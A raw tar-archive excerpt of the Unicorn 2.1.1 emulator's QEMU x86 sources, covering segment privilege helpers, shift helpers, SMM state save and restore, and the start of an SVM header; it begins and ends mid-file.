raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } #ifdef TARGET_X86_64 if (dflag == 2) { cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 32) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | DESC_L_MASK); cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 40) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } else #endif { cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 16) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 24) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } env->regs[R_ESP] = env->regs[R_ECX]; env->eip = env->regs[R_EDX]; } target_ulong helper_lsl(CPUX86State *env, target_ulong selector1) { unsigned int limit; uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl, type; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_S_MASK) { if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) { /* conforming */ } else { if (dpl < cpl || dpl < rpl) { goto fail; } } } else { type = (e2 >> DESC_TYPE_SHIFT) & 0xf; switch (type) { case 1: case 2: case 3: case 9: case 11: break; default: goto fail; } if (dpl < cpl || dpl < rpl) { fail: CC_SRC = eflags & ~CC_Z; return 0; } } limit = get_seg_limit(e1, e2); CC_SRC = eflags | CC_Z; return limit; } target_ulong helper_lar(CPUX86State *env, target_ulong selector1) { uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl, type; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_S_MASK) { if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) { /* conforming */ } else { if (dpl < cpl || dpl < rpl) { goto fail; } } } else { type = (e2 >> DESC_TYPE_SHIFT) & 0xf; switch (type) { case 1: case 2: case 3: case 4: case 5: case 9: case 11: case 12: break; default: goto fail; } if (dpl < cpl || dpl < rpl) { fail: CC_SRC = eflags & ~CC_Z; return 0; } } CC_SRC = eflags | CC_Z; return e2 & 0x00f0ff00; } void helper_verr(CPUX86State *env, target_ulong selector1) { uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } if (!(e2 & DESC_S_MASK)) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_CS_MASK) { if (!(e2 & DESC_R_MASK)) { goto fail; } if (!(e2 & DESC_C_MASK)) { if (dpl < cpl || dpl < rpl) { goto fail; } } } else { if (dpl < cpl || dpl < rpl) { fail: CC_SRC = eflags & ~CC_Z; return; } } CC_SRC = eflags | CC_Z; } void helper_verw(CPUX86State *env, target_ulong selector1) { uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } if (!(e2 & DESC_S_MASK)) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_CS_MASK) { goto fail; } else { if (dpl < cpl || dpl < rpl) { goto fail; } if (!(e2 & DESC_W_MASK)) { fail: CC_SRC = eflags & ~CC_Z; return; } } CC_SRC = eflags | CC_Z; } void cpu_x86_load_seg(CPUX86State *env, int seg_reg, int selector) { if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { int dpl = (env->eflags & VM_MASK) ? 3 : 0; selector &= 0xffff; cpu_x86_load_seg_cache(env, seg_reg, selector, (selector << 4), 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK | (dpl << DESC_DPL_SHIFT)); } else { helper_load_seg(env, seg_reg, selector); } } /* check if Port I/O is allowed in TSS */ static inline void check_io(CPUX86State *env, int addr, int size, uintptr_t retaddr) { int io_offset, val, mask; /* TSS must be a valid 32 bit one */ if (!(env->tr.flags & DESC_P_MASK) || ((env->tr.flags >> DESC_TYPE_SHIFT) & 0xf) != 9 || env->tr.limit < 103) { goto fail; } io_offset = cpu_lduw_kernel_ra(env, env->tr.base + 0x66, retaddr); io_offset += (addr >> 3); /* Note: the check needs two bytes */ if ((io_offset + 1) > env->tr.limit) { goto fail; } val = cpu_lduw_kernel_ra(env, env->tr.base + io_offset, retaddr); val >>= (addr & 7); mask = (1 << size) - 1; /* all bits must be zero to allow the I/O */ if ((val & mask) != 0) { fail: raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr); } } void helper_check_iob(CPUX86State *env, uint32_t t0) { check_io(env, t0, 1, GETPC()); } void helper_check_iow(CPUX86State *env, uint32_t t0) { check_io(env, t0, 2, GETPC()); } void helper_check_iol(CPUX86State *env, uint32_t t0) { check_io(env, t0, 4, GETPC()); } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/shift_helper_template.h����������������������������������������������0000664�0000000�0000000�00000005555�14675241067�0022664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 shift helpers * * Copyright (c) 2008 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #define DATA_BITS (1 << (3 + SHIFT)) #define SHIFT_MASK (DATA_BITS - 1) #if DATA_BITS <= 32 #define SHIFT1_MASK 0x1f #else #define SHIFT1_MASK 0x3f #endif #if DATA_BITS == 8 #define SUFFIX b #define DATA_MASK 0xff #elif DATA_BITS == 16 #define SUFFIX w #define DATA_MASK 0xffff #elif DATA_BITS == 32 #define SUFFIX l #define DATA_MASK 0xffffffff #elif DATA_BITS == 64 #define SUFFIX q #define DATA_MASK 0xffffffffffffffffULL #else #error unhandled operand size #endif target_ulong glue(helper_rcl, SUFFIX)(CPUX86State *env, target_ulong t0, target_ulong t1) { int count, eflags; target_ulong src; target_long res; count = t1 & SHIFT1_MASK; #if DATA_BITS == 16 count = rclw_table[count]; #elif DATA_BITS == 8 count = rclb_table[count]; #endif if (count) { eflags = (int)env->cc_src; t0 &= DATA_MASK; src = t0; res = (t0 << count) | ((target_ulong)(eflags & CC_C) << (count - 1)); if (count > 1) { res |= t0 >> (DATA_BITS + 1 - count); } t0 = res; env->cc_src = (eflags & ~(CC_C | CC_O)) | (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) | ((src >> (DATA_BITS - count)) & CC_C); } return t0; } target_ulong glue(helper_rcr, SUFFIX)(CPUX86State *env, target_ulong t0, target_ulong t1) { int count, eflags; target_ulong src; target_long res; count = t1 & SHIFT1_MASK; #if DATA_BITS == 16 count = rclw_table[count]; #elif DATA_BITS == 8 count = rclb_table[count]; #endif if (count) { eflags = (int)env->cc_src; t0 &= DATA_MASK; src = t0; res = (t0 >> count) | ((target_ulong)(eflags & CC_C) << (DATA_BITS - count)); if (count > 1) { res |= t0 << (DATA_BITS + 1 - count); } t0 = res; env->cc_src = (eflags & ~(CC_C | CC_O)) | (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) | ((src >> (count - 1)) & CC_C); } return t0; } #undef DATA_BITS #undef SHIFT_MASK #undef SHIFT1_MASK #undef DATA_TYPE #undef DATA_MASK #undef SUFFIX ���������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/smm_helper.c���������������������������������������������������������0000664�0000000�0000000�00000031474�14675241067�0020442�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 SMM helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" /* SMM support */ #ifdef TARGET_X86_64 #define SMM_REVISION_ID 0x00020064 #else #define SMM_REVISION_ID 0x00020000 #endif void do_smm_enter(X86CPU *cpu) { CPUX86State *env = &cpu->env; CPUState *cs = CPU(cpu); target_ulong sm_state; SegmentCache *dt; int i, offset; // qemu_log_mask(CPU_LOG_INT, "SMM: enter\n"); // log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); env->msr_smi_count++; env->hflags |= HF_SMM_MASK; if (env->hflags2 & HF2_NMI_MASK) { env->hflags2 |= HF2_SMM_INSIDE_NMI_MASK; } else { env->hflags2 |= HF2_NMI_MASK; } sm_state = env->smbase + 0x8000; #ifdef TARGET_X86_64 for (i = 0; i < 6; i++) { dt = &env->segs[i]; offset = 0x7e00 + i * 16; x86_stw_phys(cs, sm_state + offset, dt->selector); x86_stw_phys(cs, sm_state + offset + 2, (dt->flags >> 8) & 0xf0ff); x86_stl_phys(cs, sm_state + offset + 4, dt->limit); x86_stq_phys(cs, sm_state + offset + 8, dt->base); } x86_stq_phys(cs, sm_state + 0x7e68, env->gdt.base); x86_stl_phys(cs, sm_state + 0x7e64, env->gdt.limit); x86_stw_phys(cs, sm_state + 0x7e70, env->ldt.selector); x86_stq_phys(cs, sm_state + 0x7e78, env->ldt.base); x86_stl_phys(cs, sm_state + 0x7e74, env->ldt.limit); x86_stw_phys(cs, sm_state + 0x7e72, (env->ldt.flags >> 8) & 0xf0ff); x86_stq_phys(cs, sm_state + 0x7e88, env->idt.base); x86_stl_phys(cs, sm_state + 0x7e84, env->idt.limit); x86_stw_phys(cs, sm_state + 0x7e90, env->tr.selector); x86_stq_phys(cs, sm_state + 0x7e98, env->tr.base); x86_stl_phys(cs, sm_state + 0x7e94, env->tr.limit); x86_stw_phys(cs, sm_state + 0x7e92, (env->tr.flags >> 8) & 0xf0ff); /* ??? Vol 1, 16.5.6 Intel MPX and SMM says that IA32_BNDCFGS is saved at offset 7ED0. Vol 3, 34.4.1.1, Table 32-2, has 7EA0-7ED7 as "reserved". What's this, and what's really supposed to happen? */ x86_stq_phys(cs, sm_state + 0x7ed0, env->efer); x86_stq_phys(cs, sm_state + 0x7ff8, env->regs[R_EAX]); x86_stq_phys(cs, sm_state + 0x7ff0, env->regs[R_ECX]); x86_stq_phys(cs, sm_state + 0x7fe8, env->regs[R_EDX]); x86_stq_phys(cs, sm_state + 0x7fe0, env->regs[R_EBX]); x86_stq_phys(cs, sm_state + 0x7fd8, env->regs[R_ESP]); x86_stq_phys(cs, sm_state + 0x7fd0, env->regs[R_EBP]); x86_stq_phys(cs, sm_state + 0x7fc8, env->regs[R_ESI]); x86_stq_phys(cs, sm_state + 0x7fc0, env->regs[R_EDI]); for (i = 8; i < 16; i++) { x86_stq_phys(cs, sm_state + 0x7ff8 - i * 8, env->regs[i]); } x86_stq_phys(cs, sm_state + 0x7f78, env->eip); x86_stl_phys(cs, sm_state + 0x7f70, cpu_compute_eflags(env)); x86_stl_phys(cs, sm_state + 0x7f68, env->dr[6]); x86_stl_phys(cs, sm_state + 0x7f60, env->dr[7]); x86_stl_phys(cs, sm_state + 0x7f48, env->cr[4]); x86_stq_phys(cs, sm_state + 0x7f50, env->cr[3]); x86_stl_phys(cs, sm_state + 0x7f58, env->cr[0]); x86_stl_phys(cs, sm_state + 0x7efc, SMM_REVISION_ID); x86_stl_phys(cs, sm_state + 0x7f00, env->smbase); #else x86_stl_phys(cs, sm_state + 0x7ffc, env->cr[0]); x86_stl_phys(cs, sm_state + 0x7ff8, env->cr[3]); x86_stl_phys(cs, sm_state + 0x7ff4, cpu_compute_eflags(env)); x86_stl_phys(cs, sm_state + 0x7ff0, env->eip); x86_stl_phys(cs, sm_state + 0x7fec, env->regs[R_EDI]); x86_stl_phys(cs, sm_state + 0x7fe8, env->regs[R_ESI]); x86_stl_phys(cs, sm_state + 0x7fe4, env->regs[R_EBP]); x86_stl_phys(cs, sm_state + 0x7fe0, env->regs[R_ESP]); x86_stl_phys(cs, sm_state + 0x7fdc, env->regs[R_EBX]); x86_stl_phys(cs, sm_state + 0x7fd8, env->regs[R_EDX]); x86_stl_phys(cs, sm_state + 0x7fd4, env->regs[R_ECX]); x86_stl_phys(cs, sm_state + 0x7fd0, env->regs[R_EAX]); x86_stl_phys(cs, sm_state + 0x7fcc, env->dr[6]); x86_stl_phys(cs, sm_state + 0x7fc8, env->dr[7]); x86_stl_phys(cs, sm_state + 0x7fc4, env->tr.selector); x86_stl_phys(cs, sm_state + 0x7f64, env->tr.base); x86_stl_phys(cs, sm_state + 0x7f60, env->tr.limit); x86_stl_phys(cs, sm_state + 0x7f5c, (env->tr.flags >> 8) & 0xf0ff); x86_stl_phys(cs, sm_state + 0x7fc0, env->ldt.selector); x86_stl_phys(cs, sm_state + 0x7f80, env->ldt.base); x86_stl_phys(cs, sm_state + 0x7f7c, env->ldt.limit); x86_stl_phys(cs, sm_state + 0x7f78, (env->ldt.flags >> 8) & 0xf0ff); x86_stl_phys(cs, sm_state + 0x7f74, env->gdt.base); x86_stl_phys(cs, sm_state + 0x7f70, env->gdt.limit); x86_stl_phys(cs, sm_state + 0x7f58, env->idt.base); x86_stl_phys(cs, sm_state + 0x7f54, env->idt.limit); for (i = 0; i < 6; i++) { dt = &env->segs[i]; if (i < 3) { offset = 0x7f84 + i * 12; } else { offset = 0x7f2c + (i - 3) * 12; } x86_stl_phys(cs, sm_state + 0x7fa8 + i * 4, dt->selector); x86_stl_phys(cs, sm_state + offset + 8, dt->base); x86_stl_phys(cs, sm_state + offset + 4, dt->limit); x86_stl_phys(cs, sm_state + offset, (dt->flags >> 8) & 0xf0ff); } x86_stl_phys(cs, sm_state + 0x7f14, env->cr[4]); x86_stl_phys(cs, sm_state + 0x7efc, SMM_REVISION_ID); x86_stl_phys(cs, sm_state + 0x7ef8, env->smbase); #endif /* init SMM cpu state */ #ifdef TARGET_X86_64 cpu_load_efer(env, 0); #endif cpu_load_eflags(env, 0, ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); env->eip = 0x00008000; cpu_x86_update_cr0(env, env->cr[0] & ~(CR0_PE_MASK | CR0_EM_MASK | CR0_TS_MASK | CR0_PG_MASK)); cpu_x86_update_cr4(env, 0); env->dr[7] = 0x00000400; cpu_x86_load_seg_cache(env, R_CS, (env->smbase >> 4) & 0xffff, env->smbase, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); } void helper_rsm(CPUX86State *env) { CPUState *cs = env_cpu(env); target_ulong sm_state; int i, offset; uint32_t val; sm_state = env->smbase + 0x8000; #ifdef TARGET_X86_64 cpu_load_efer(env, x86_ldq_phys(cs, sm_state + 0x7ed0)); env->gdt.base = x86_ldq_phys(cs, sm_state + 0x7e68); env->gdt.limit = x86_ldl_phys(cs, sm_state + 0x7e64); env->ldt.selector = x86_lduw_phys(cs, sm_state + 0x7e70); env->ldt.base = x86_ldq_phys(cs, sm_state + 0x7e78); env->ldt.limit = x86_ldl_phys(cs, sm_state + 0x7e74); env->ldt.flags = (x86_lduw_phys(cs, sm_state + 0x7e72) & 0xf0ff) << 8; env->idt.base = x86_ldq_phys(cs, sm_state + 0x7e88); env->idt.limit = x86_ldl_phys(cs, sm_state + 0x7e84); env->tr.selector = x86_lduw_phys(cs, sm_state + 0x7e90); env->tr.base = x86_ldq_phys(cs, sm_state + 0x7e98); env->tr.limit = x86_ldl_phys(cs, sm_state + 0x7e94); env->tr.flags = (x86_lduw_phys(cs, sm_state + 0x7e92) & 0xf0ff) << 8; env->regs[R_EAX] = x86_ldq_phys(cs, sm_state + 0x7ff8); env->regs[R_ECX] = x86_ldq_phys(cs, sm_state + 0x7ff0); env->regs[R_EDX] = x86_ldq_phys(cs, sm_state + 0x7fe8); env->regs[R_EBX] = x86_ldq_phys(cs, sm_state + 0x7fe0); env->regs[R_ESP] = x86_ldq_phys(cs, sm_state + 0x7fd8); env->regs[R_EBP] = x86_ldq_phys(cs, sm_state + 0x7fd0); env->regs[R_ESI] = x86_ldq_phys(cs, sm_state + 0x7fc8); env->regs[R_EDI] = x86_ldq_phys(cs, sm_state + 0x7fc0); for (i = 8; i < 16; i++) { env->regs[i] = x86_ldq_phys(cs, sm_state + 0x7ff8 - i * 8); } env->eip = x86_ldq_phys(cs, sm_state + 0x7f78); cpu_load_eflags(env, x86_ldl_phys(cs, sm_state + 0x7f70), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); env->dr[6] = x86_ldl_phys(cs, sm_state + 0x7f68); env->dr[7] = x86_ldl_phys(cs, sm_state + 0x7f60); cpu_x86_update_cr4(env, x86_ldl_phys(cs, sm_state + 0x7f48)); cpu_x86_update_cr3(env, x86_ldq_phys(cs, sm_state + 0x7f50)); cpu_x86_update_cr0(env, x86_ldl_phys(cs, sm_state + 0x7f58)); for (i = 0; i < 6; i++) { offset = 0x7e00 + i * 16; cpu_x86_load_seg_cache(env, i, x86_lduw_phys(cs, sm_state + offset), x86_ldq_phys(cs, sm_state + offset + 8), x86_ldl_phys(cs, sm_state + offset + 4), (x86_lduw_phys(cs, sm_state + offset + 2) & 0xf0ff) << 8); } val = x86_ldl_phys(cs, sm_state + 0x7efc); /* revision ID */ if (val & 0x20000) { env->smbase = x86_ldl_phys(cs, sm_state + 0x7f00); } #else cpu_x86_update_cr0(env, x86_ldl_phys(cs, sm_state + 0x7ffc)); cpu_x86_update_cr3(env, x86_ldl_phys(cs, sm_state + 0x7ff8)); cpu_load_eflags(env, x86_ldl_phys(cs, sm_state + 0x7ff4), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); env->eip = x86_ldl_phys(cs, sm_state + 0x7ff0); env->regs[R_EDI] = x86_ldl_phys(cs, sm_state + 0x7fec); env->regs[R_ESI] = x86_ldl_phys(cs, sm_state + 0x7fe8); env->regs[R_EBP] = x86_ldl_phys(cs, sm_state + 0x7fe4); env->regs[R_ESP] = x86_ldl_phys(cs, sm_state + 0x7fe0); env->regs[R_EBX] = x86_ldl_phys(cs, sm_state + 0x7fdc); env->regs[R_EDX] = x86_ldl_phys(cs, sm_state + 0x7fd8); env->regs[R_ECX] = x86_ldl_phys(cs, sm_state + 0x7fd4); env->regs[R_EAX] = x86_ldl_phys(cs, sm_state + 0x7fd0); env->dr[6] = x86_ldl_phys(cs, sm_state + 0x7fcc); env->dr[7] = x86_ldl_phys(cs, sm_state + 0x7fc8); env->tr.selector = x86_ldl_phys(cs, sm_state + 0x7fc4) & 0xffff; env->tr.base = x86_ldl_phys(cs, sm_state + 0x7f64); env->tr.limit = x86_ldl_phys(cs, sm_state + 0x7f60); env->tr.flags = (x86_ldl_phys(cs, sm_state + 0x7f5c) & 0xf0ff) << 8; env->ldt.selector = x86_ldl_phys(cs, sm_state + 0x7fc0) & 0xffff; env->ldt.base = x86_ldl_phys(cs, sm_state + 0x7f80); env->ldt.limit = x86_ldl_phys(cs, sm_state + 0x7f7c); env->ldt.flags = (x86_ldl_phys(cs, sm_state + 0x7f78) & 0xf0ff) << 8; env->gdt.base = x86_ldl_phys(cs, sm_state + 0x7f74); env->gdt.limit = x86_ldl_phys(cs, sm_state + 0x7f70); env->idt.base = x86_ldl_phys(cs, sm_state + 0x7f58); env->idt.limit = x86_ldl_phys(cs, sm_state + 0x7f54); for (i = 0; i < 6; i++) { if (i < 3) { offset = 0x7f84 + i * 12; } else { offset = 0x7f2c + (i - 3) * 12; } cpu_x86_load_seg_cache(env, i, x86_ldl_phys(cs, sm_state + 0x7fa8 + i * 4) & 0xffff, x86_ldl_phys(cs, sm_state + offset + 8), x86_ldl_phys(cs, sm_state + offset + 4), (x86_ldl_phys(cs, sm_state + offset) & 0xf0ff) << 8); } cpu_x86_update_cr4(env, x86_ldl_phys(cs, sm_state + 0x7f14)); val = x86_ldl_phys(cs, sm_state + 0x7efc); /* revision ID */ if (val & 0x20000) { env->smbase = x86_ldl_phys(cs, sm_state + 0x7ef8); } #endif if ((env->hflags2 & HF2_SMM_INSIDE_NMI_MASK) == 0) { env->hflags2 &= ~HF2_NMI_MASK; } env->hflags2 &= ~HF2_SMM_INSIDE_NMI_MASK; env->hflags &= ~HF_SMM_MASK; // qemu_log_mask(CPU_LOG_INT, "SMM: after RSM\n"); // log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/svm.h����������������������������������������������������������������0000664�0000000�0000000�00000014211�14675241067�0017107�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef SVM_H #define SVM_H #include "qemu/compiler.h" #define TLB_CONTROL_DO_NOTHING 0 #define TLB_CONTROL_FLUSH_ALL_ASID 1 #define V_TPR_MASK 0x0f #define V_IRQ_SHIFT 8 #define V_IRQ_MASK (1 << V_IRQ_SHIFT) #define V_INTR_PRIO_SHIFT 16 #define V_INTR_PRIO_MASK (0x0f << V_INTR_PRIO_SHIFT) #define V_IGN_TPR_SHIFT 20 #define V_IGN_TPR_MASK (1 << V_IGN_TPR_SHIFT) #define V_INTR_MASKING_SHIFT 24 #define V_INTR_MASKING_MASK (1 << V_INTR_MASKING_SHIFT) #define SVM_INTERRUPT_SHADOW_MASK 1 #define SVM_IOIO_STR_SHIFT 2 #define SVM_IOIO_REP_SHIFT 3 #define SVM_IOIO_SIZE_SHIFT 4 #define SVM_IOIO_ASIZE_SHIFT 7 #define SVM_IOIO_TYPE_MASK 1 #define SVM_IOIO_STR_MASK (1 << SVM_IOIO_STR_SHIFT) #define SVM_IOIO_REP_MASK (1 << SVM_IOIO_REP_SHIFT) #define SVM_IOIO_SIZE_MASK (7 << SVM_IOIO_SIZE_SHIFT) #define SVM_IOIO_ASIZE_MASK (7 << SVM_IOIO_ASIZE_SHIFT) #define SVM_EVTINJ_VEC_MASK 0xff #define SVM_EVTINJ_TYPE_SHIFT 8 #define SVM_EVTINJ_TYPE_MASK (7 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_INTR (0 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_NMI (2 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_EXEPT (3 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_SOFT (4 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_VALID (1 << 31) #define SVM_EVTINJ_VALID_ERR (1 << 11) #define SVM_EXITINTINFO_VEC_MASK SVM_EVTINJ_VEC_MASK #define SVM_EXITINTINFO_TYPE_INTR SVM_EVTINJ_TYPE_INTR #define SVM_EXITINTINFO_TYPE_NMI SVM_EVTINJ_TYPE_NMI #define SVM_EXITINTINFO_TYPE_EXEPT SVM_EVTINJ_TYPE_EXEPT #define SVM_EXITINTINFO_TYPE_SOFT SVM_EVTINJ_TYPE_SOFT #define SVM_EXITINTINFO_VALID SVM_EVTINJ_VALID #define SVM_EXITINTINFO_VALID_ERR SVM_EVTINJ_VALID_ERR #define SVM_EXIT_READ_CR0 0x000 #define SVM_EXIT_READ_CR3 0x003 #define SVM_EXIT_READ_CR4 0x004 #define SVM_EXIT_READ_CR8 0x008 #define SVM_EXIT_WRITE_CR0 0x010 #define SVM_EXIT_WRITE_CR3 0x013 #define SVM_EXIT_WRITE_CR4 0x014 #define SVM_EXIT_WRITE_CR8 0x018 #define SVM_EXIT_READ_DR0 0x020 #define SVM_EXIT_READ_DR1 0x021 #define SVM_EXIT_READ_DR2 0x022 #define SVM_EXIT_READ_DR3 0x023 #define SVM_EXIT_READ_DR4 0x024 #define SVM_EXIT_READ_DR5 0x025 #define SVM_EXIT_READ_DR6 0x026 #define SVM_EXIT_READ_DR7 0x027 #define SVM_EXIT_WRITE_DR0 0x030 #define SVM_EXIT_WRITE_DR1 0x031 #define SVM_EXIT_WRITE_DR2 0x032 #define SVM_EXIT_WRITE_DR3 0x033 #define SVM_EXIT_WRITE_DR4 0x034 #define SVM_EXIT_WRITE_DR5 0x035 #define SVM_EXIT_WRITE_DR6 0x036 #define SVM_EXIT_WRITE_DR7 0x037 #define SVM_EXIT_EXCP_BASE 0x040 #define SVM_EXIT_INTR 0x060 #define SVM_EXIT_NMI 0x061 #define SVM_EXIT_SMI 0x062 #define SVM_EXIT_INIT 0x063 #define SVM_EXIT_VINTR 0x064 #define SVM_EXIT_CR0_SEL_WRITE 0x065 #define SVM_EXIT_IDTR_READ 0x066 #define SVM_EXIT_GDTR_READ 0x067 #define SVM_EXIT_LDTR_READ 0x068 #define SVM_EXIT_TR_READ 0x069 #define SVM_EXIT_IDTR_WRITE 0x06a #define SVM_EXIT_GDTR_WRITE 0x06b #define SVM_EXIT_LDTR_WRITE 0x06c #define SVM_EXIT_TR_WRITE 0x06d #define SVM_EXIT_RDTSC 0x06e #define SVM_EXIT_RDPMC 0x06f #define SVM_EXIT_PUSHF 0x070 #define SVM_EXIT_POPF 0x071 #define SVM_EXIT_CPUID 0x072 #define SVM_EXIT_RSM 0x073 #define SVM_EXIT_IRET 0x074 #define SVM_EXIT_SWINT 0x075 #define SVM_EXIT_INVD 0x076 #define SVM_EXIT_PAUSE 0x077 #define SVM_EXIT_HLT 0x078 #define SVM_EXIT_INVLPG 0x079 #define SVM_EXIT_INVLPGA 0x07a #define SVM_EXIT_IOIO 0x07b #define SVM_EXIT_MSR 0x07c #define SVM_EXIT_TASK_SWITCH 0x07d #define SVM_EXIT_FERR_FREEZE 0x07e #define SVM_EXIT_SHUTDOWN 0x07f #define SVM_EXIT_VMRUN 0x080 #define SVM_EXIT_VMMCALL 0x081 #define SVM_EXIT_VMLOAD 0x082 #define SVM_EXIT_VMSAVE 0x083 #define SVM_EXIT_STGI 0x084 #define SVM_EXIT_CLGI 0x085 #define SVM_EXIT_SKINIT 0x086 #define SVM_EXIT_RDTSCP 0x087 #define SVM_EXIT_ICEBP 0x088 #define SVM_EXIT_WBINVD 0x089 /* only included in documentation, maybe wrong */ #define SVM_EXIT_MONITOR 0x08a #define SVM_EXIT_MWAIT 0x08b #define SVM_EXIT_NPF 0x400 #define SVM_EXIT_ERR -1 #define SVM_CR0_SELECTIVE_MASK (1 << 3 | 1) /* TS and MP */ #define SVM_NPT_ENABLED (1 << 0) #define SVM_NPT_PAE (1 << 0) #define SVM_NPT_LMA (1 << 1) #define SVM_NPT_NXE (1 << 2) #define SVM_NPTEXIT_P (1ULL << 0) #define SVM_NPTEXIT_RW (1ULL << 1) #define SVM_NPTEXIT_US (1ULL << 2) #define SVM_NPTEXIT_RSVD 